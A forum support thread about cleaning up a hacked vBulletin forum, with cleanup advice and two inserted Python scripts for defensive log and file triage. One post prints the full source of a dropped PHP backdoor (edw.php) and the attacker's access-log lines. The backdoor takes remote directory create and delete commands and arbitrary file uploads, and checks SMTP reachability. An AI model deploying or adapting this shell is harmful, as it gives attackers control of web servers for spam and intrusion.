Kokosina.in - Anyone Else Getting This?
I had this too - clean install back in July 2011... users were getting alerts on ver 4.1.11.
-
It looks like my forums are clean now. I was running vBulletin 4.0.8. I upgraded with a clean install to vBulletin 4.1.9. The clean install ensured that any compromised vBulletin source files were removed. During the install, once you're in the AdminCP, all of the modified templates are identified and you're given the option to revert them, which I did. This ensured that any compromised templates were corrected. I gather the vulnerability that existed in some versions, like 4.0.8, has been corrected by (or even before) the latest version 4.1.9, so I'm hopeful that this is behind me now. Google has reviewed my forums and detected no malware.
I've added an .htaccess file in my root directory to block the IP identified in the earlier post by Wayne. I think having just the one .htaccess file in the root directory may be best. If any .htaccess files appear in sub-directories then I'll know just by their presence that they are bogus and should be deleted.
I changed my FTP and VBulletin Admin passwords. I don't think these were compromised, but just to be careful.
Many thanks to Wayne for the excellent and timely support.
-
I'd recommend not running the main site under HTTPS. If you do, then make sure all your settings point to the SSL version.
For security, run just the Admin CP under HTTPS; it doesn't have the reliance on AJAX and JavaScript that the main site does, so it will work better.
-
I modified the .htaccess file in the main directory to have the entire site run under SSL. I'm accepting the 'security warning', but all I get is a blank page. The new thread never posts. I can, however, reply to posts. It's just hard to pinpoint what the problem might be since I've done several things over the past few weeks to get rid of the virus and prevent my site from getting another one. Do you have any recommended actions to fix this? Any maintenance I can do on the board? Should I try re-installing 4.19? Thanks,
Frank
-
Ok so I've opened up the board again and I can't seem to be able to post new threads. I can reply, though. My forum is here: https://www.richardbey.org/forums. When submitting the form to post a new thread I get this now: Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could easily be read by a third party.
Is it not posting because it's going through the SSL now? Thoughts? Thanks,
Frank
-
Like I said, the contents of that folder are to install the default data that comes with the CMS. If all you had was the forum, I am not sure why you have those files.
-
Ok, thanks. The names of those HTML files seemed strange/foreign sounding to me, so I figured I'd ask.
-
Like I said, the jsonwrapper folder isn't a valid folder in 4.1.9, so you can probably delete it. Don't know if it was added by an addon, though.
The cmsdefaultdata folder contains the information that is optionally imported when you install/upgrade the Publishing Suite. If you delete it, it won't hurt anything but it is a valid folder.
-
So what should I do about the jsonwrapper directory? Delete it?
How about the cmsdefaultdata folder? I did some digging in it and it has a ton of files. It has a subdirectory with my admin name and files such as jimm-na-russkom.html, jimm-nastroyka-nokia-6233.html, and aska-na-telefon-samsung-gt-s5230.html. What the heck are these? Parts of the virus?? Most of the files in the cmsdefaultdata folder have the same dates as the files I deleted earlier, which leads me to believe they're part of the virus. There's also a ton of .jpgs and .pngs in the attachments subdirectory (same date as previously cleared out files) with names of 37236-37647. If these are still part of the virus then why didn't the file scanner find these? Is it because they're in directories that vBulletin isn't even looking for?
Thanks,
Frank
-
Originally posted by ramf02:
While deleting my files, I came across a directory that didn't seem to get checked: includes/facebook/jsonwrapper. The date is the same date as all the files I'm deleting. Should this folder exist? Same with install/cmsdefaultdata folder, and there is an index.html file in the /install folder with the date of all the suspect files. Thanks!
Most directories include an index.html file. These are 0 byte empty files and put there just in case a web server has file indexing turned on for some reason. They prevent lookie-loos from seeing the contents of the individual directories.
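Wayne's point that the index.html placeholders are 0-byte files, together with Frank's observation that the suspect files in cmsdefaultdata share a timestamp with the ones he already deleted, can be turned into a simple filesystem triage. The script below is an added example, not the vBulletin file checker or any code from the thread; KNOWN_PHP, KNOWN_BAD_MTIME and the sample directory tree it builds are constructed assumptions standing in for a real install's shipped file list and the timestamp of the already-identified malicious files.

```python
import os
import tempfile
from datetime import datetime
from pathlib import Path

# Hypothetical baseline: relative paths of PHP files the vBulletin release ships.
# A real one would be generated from a clean extract of the same version.
KNOWN_PHP = {"forum/includes/class_core.php"}
# Constructed reference point: the time of the edw.php POST in the thread's log lines.
KNOWN_BAD_MTIME = datetime.strptime("08/Dec/2011:02:27:44 -0700", "%d/%b/%Y:%H:%M:%S %z").timestamp()
# Calls a stray PHP file in a forum tree has little legitimate reason to make.
SUSPICIOUS_PHP_TOKENS = ("move_uploaded_file", "$_FILES", "dl(", "socket_connect")

def build_sample_tree():
    """Construct a small vBulletin-like tree for demonstration (sample data, not a real install)."""
    root = Path(tempfile.mkdtemp())
    (root / "forum" / "includes" / "facebook" / "jsonwrapper").mkdir(parents=True)
    (root / "forum" / "install" / "cmsdefaultdata").mkdir(parents=True)
    (root / "forum" / "index.html").write_bytes(b"")  # normal: empty placeholder
    (root / "forum" / "includes" / "class_core.php").write_text("<?php // shipped core file ?>")
    (root / "forum" / "edw.php").write_text("<?php move_uploaded_file($_FILES['file']['tmp_name'], $_POST['dir']); ?>")
    (root / "forum" / "includes" / "facebook" / "jsonwrapper" / "index.html").write_text("<html>spam</html>")
    (root / "forum" / "install" / "cmsdefaultdata" / "jimm-na-russkom.html").write_text("<html>spam</html>")
    for p in ("forum/edw.php", "forum/install/cmsdefaultdata/jimm-na-russkom.html"):
        os.utime(root / p, (KNOWN_BAD_MTIME, KNOWN_BAD_MTIME))  # same timestamp as the drop
    return root

def triage(root, known_php=KNOWN_PHP, bad_mtimes=(KNOWN_BAD_MTIME,), tolerance=60):
    """Return sorted (relative_path, reason) pairs for every file matching an indicator."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        st = path.stat()
        if path.name == "index.html" and st.st_size != 0:
            findings.append((rel, "index.html is not the 0-byte placeholder"))
        if path.suffix == ".php" and rel not in known_php:
            hits = [t for t in SUSPICIOUS_PHP_TOKENS if t in path.read_text(errors="ignore")]
            reason = "PHP file not in shipped file list" + (f" (calls {', '.join(hits)})" if hits else "")
            findings.append((rel, reason))
        if rel not in known_php and any(abs(st.st_mtime - t) <= tolerance for t in bad_mtimes):
            findings.append((rel, "mtime matches already-identified malicious files"))
    return sorted(findings)
```

Run against a real document root with a baseline built from a clean copy of the same version, the mtime rule is what surfaces files in directories the built-in checker never looks at, such as cmsdefaultdata.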
-
This happened on my 4.1.9 board, the only file that the checker found without default contents was class_core.php which I modified for cloudflare.
File found: edw.php
Contents:
Code:
<?php
// Loads a PHP extension at runtime, trying the .so (or php_*.dll on Windows) name
function LoadExtension($ext) {
    $lib = $ext.'.so';
    if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
        $lib = 'php_'.$ext.'.dll';
    if(!extension_loaded($ext)) {
        if(!dl($lib))
            return FALSE;
    }
    return TRUE;
}

// Tests whether outbound TCP port 25 (SMTP) is reachable from the server
function Check25Port() {
    $res = TRUE;
    $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if(@socket_connect($s, 'mxs.mail.ru', 25) == FALSE)
        $res = FALSE;
    socket_close($s);
    return $res;
}

// Reports whether the host is usable: PHP >= 4.1.0, sockets extension, port 25 open
function Check() {
    // Version >= 4.1.0
    if(strnatcmp(phpversion(), '4.1.0') < 0)
        return FALSE;
    // Check for safe mode
    //if(ini_get('safe_mode'))
    //    return FALSE;
    // Check 'sockets' ext
    if(!LoadExtension('sockets'))
        return FALSE;
    // Check 25 port
    if(!Check25Port())
        return FALSE;
    return TRUE;
}

// Recursively deletes a directory tree
function RemoveDir($dir) {
    $res = FALSE;
    if(is_dir($dir)) {
        $objects = scandir($dir);
        foreach($objects as $object) {
            if($object != "." && $object != "..") {
                if(filetype($dir."/".$object) == "dir")
                    RemoveDir($dir."/".$object);
                else
                    unlink($dir."/".$object);
            }
        }
        reset($objects);
        $res = rmdir($dir);
    }
    return $res;
}

// Writes an uploaded file into the POSTed directory under its original name
function Upload($dir) {
    $res = move_uploaded_file($_FILES["file"]["tmp_name"], $dir.'/'.$_FILES["file"]["name"]);
    return $res;
}

// Dispatcher: the POST 'type' field selects check / mkdir / rmdir / upload;
// every response starts with the banner 'EDW' followed by OK or FAILED
function Work() {
    $type = $_POST['type'];
    $res = FALSE;
    echo('EDW');
    if($type == 'check') {
        $res = Check();
    } else if($type == 'mkdir') {
        $dir = $_POST['dir'];
        $res = mkdir($dir);
    } else if($type == 'rmdir') {
        $dir = $_POST['dir'];
        $res = RemoveDir($dir);
    } else if($type == 'upload') {
        $dir = $_POST['dir'];
        $res = Upload($dir);
    }
    if($res)
        echo('OK');
    else
        echo('FAILED');
}
Work();
?>
178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
I was running an old VB version back then.
Last edited by mmavipc; Thu 5 Jan '12, 11:34pm.
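A defender-side way to use the three log lines mmavipc posted: the script below is an added example, not code from the thread or from vBulletin. It assumes a hypothetical baseline KNOWN_PHP of the forum's legitimate POST endpoints (a real one would be generated from the shipped file list), parses Apache combined-format lines, flags a successful POST to a PHP path outside that baseline, and lists the same client's preceding requests in a short window, which for these lines points at commons.php as the request the file arrived through.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sample input: the Apache combined-log lines quoted in the thread above.
SAMPLE_LOG = """\
178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

# Hypothetical baseline of PHP entry points that legitimately take POSTs on this forum;
# on a real install, build it from the release's file list instead of typing it in.
KNOWN_PHP = {"/forum/commons.php", "/forum/newthread.php", "/forum/newreply.php",
             "/forum/ajax.php", "/forum/login.php"}

def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status, _size = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": ip, "when": when, "method": method,
            "path": path.split("?")[0], "status": int(status)}

def find_dropped_shells(log_text, window=timedelta(minutes=5)):
    """Return one finding per successful POST to a PHP path outside the baseline,
    with the same client's earlier requests inside the window (the likely drop path)."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = []
    for e in events:
        if (e["method"] == "POST" and e["path"].endswith(".php")
                and e["path"] not in KNOWN_PHP and e["status"] == 200):
            prior = [p["path"] for p in by_ip[e["ip"]]
                     if e["when"] - window <= p["when"] < e["when"]]
            findings.append({"ip": e["ip"], "shell": e["path"],
                             "first_seen": e["when"].isoformat(), "preceded_by": prior})
    return findings

if __name__ == "__main__":
    for f in find_dropped_shells(SAMPLE_LOG):
        print(f)
```

The first request to the unknown file is the earliest moment the shell existed, so the preceding requests from that client bound the window in which the upload vulnerability was exercised.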